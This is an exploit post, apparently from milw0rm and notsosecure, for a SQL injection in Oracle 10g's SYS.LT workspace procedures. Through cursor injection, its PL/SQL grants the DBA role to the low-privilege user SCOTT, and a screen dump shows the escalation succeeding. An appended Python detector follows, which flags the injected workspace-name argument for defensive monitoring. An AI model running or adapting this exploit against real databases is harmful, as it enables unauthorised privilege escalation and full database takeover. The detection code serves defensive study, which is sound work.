Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit
2009-07-04 21:44
This is a slightly modified version of: http://milw0rm.com/exploits/7677

This is based on cursor injection and does not need create function privileges:

DECLARE
D NUMBER;
BEGIN
D := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);
SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
end;

#-----------screen dump---------------------------------------------------#

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          EXECUTE_CATALOG_ROLE           NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO

SQL> DECLARE
  2  D NUMBER;
  3  BEGIN
  4  D := DBMS_SQL.OPEN_CURSOR;
  5  DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute imme
diate ''grant dba to scott'';commit;end;',0);
  6  SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
  7  SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
  8  end;
  9
 10
 11  /
DECLARE
*
ERROR at line 1:
ORA-01403: no data found
ORA-06512: at "SYS.LT", line 6118
ORA-06512: at "SYS.LT", line 6087
ORA-06512: at line 7

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          DBA                            NO  YES NO
SCOTT                          EXECUTE_CATALOG_ROLE           NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO

Sid
www.notsosecure.com

# milw0rm.com [2009-07-02]
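For detection, the workspace-name argument in the block above is what stands out: it carries an escaped quote, a dbms_sql.execute call and a trailing comment marker. The following is an added example, not part of the original post, that rebuilds that argument from captured statement text and flags it; it assumes you already have the statement text from an audit or monitoring source, and the function names and the benign sample are constructed for illustration.

```python
import re

# Entry points named on this page; the list is an assumption to extend.
LT_CALL = re.compile(
    r"\b(?:SYS\s*\.\s*)?LT\s*\.\s*(CREATEWORKSPACE|COMPRESSWORKSPACETREE)\s*\(",
    re.IGNORECASE)
LITERAL = re.compile(r"\s*'((?:[^']|'')*)'")   # '' is an escaped quote
OPERAND = re.compile(r"\s*[\w.$#]+")           # variable or number
CONCAT = re.compile(r"\s*\|\|")
CHECKS = [
    ("embedded quote", re.compile(r"'")),
    ("dbms_sql.execute call", re.compile(r"dbms_sql\s*\.\s*execute", re.I)),
    ("comment marker", re.compile(r"--")),
]

def argument_text(sql, pos):
    """Rebuild the first argument: literals decoded, other operands as <expr>."""
    parts = []
    while True:
        m = LITERAL.match(sql, pos)
        if m:
            parts.append(m.group(1).replace("''", "'"))
        else:
            m = OPERAND.match(sql, pos)
            if not m:
                break
            parts.append("<expr>")
        pos = m.end()
        c = CONCAT.match(sql, pos)
        if not c:
            break
        pos = c.end()
    return "".join(parts)

def flag_lt_calls(sql):
    """Return (procedure, rebuilt argument, reasons) for each suspicious call."""
    findings = []
    for call in LT_CALL.finditer(sql):
        arg = argument_text(sql, call.end())
        reasons = [name for name, rx in CHECKS if rx.search(arg)]
        if reasons:
            findings.append((call.group(1).upper(), arg, reasons))
    return findings

BENIGN = "BEGIN SYS.LT.CREATEWORKSPACE('release_q3'); END;"  # constructed
FROM_PAGE = ("SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--'); "
             "SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');")

if __name__ == "__main__":
    for text in (BENIGN, FROM_PAGE):
        print(flag_lt_calls(text))
```

A workspace name that legitimately contains an apostrophe or a double hyphen would also be flagged, so treat a single reason as a lead and the combination of all three as the strong signal.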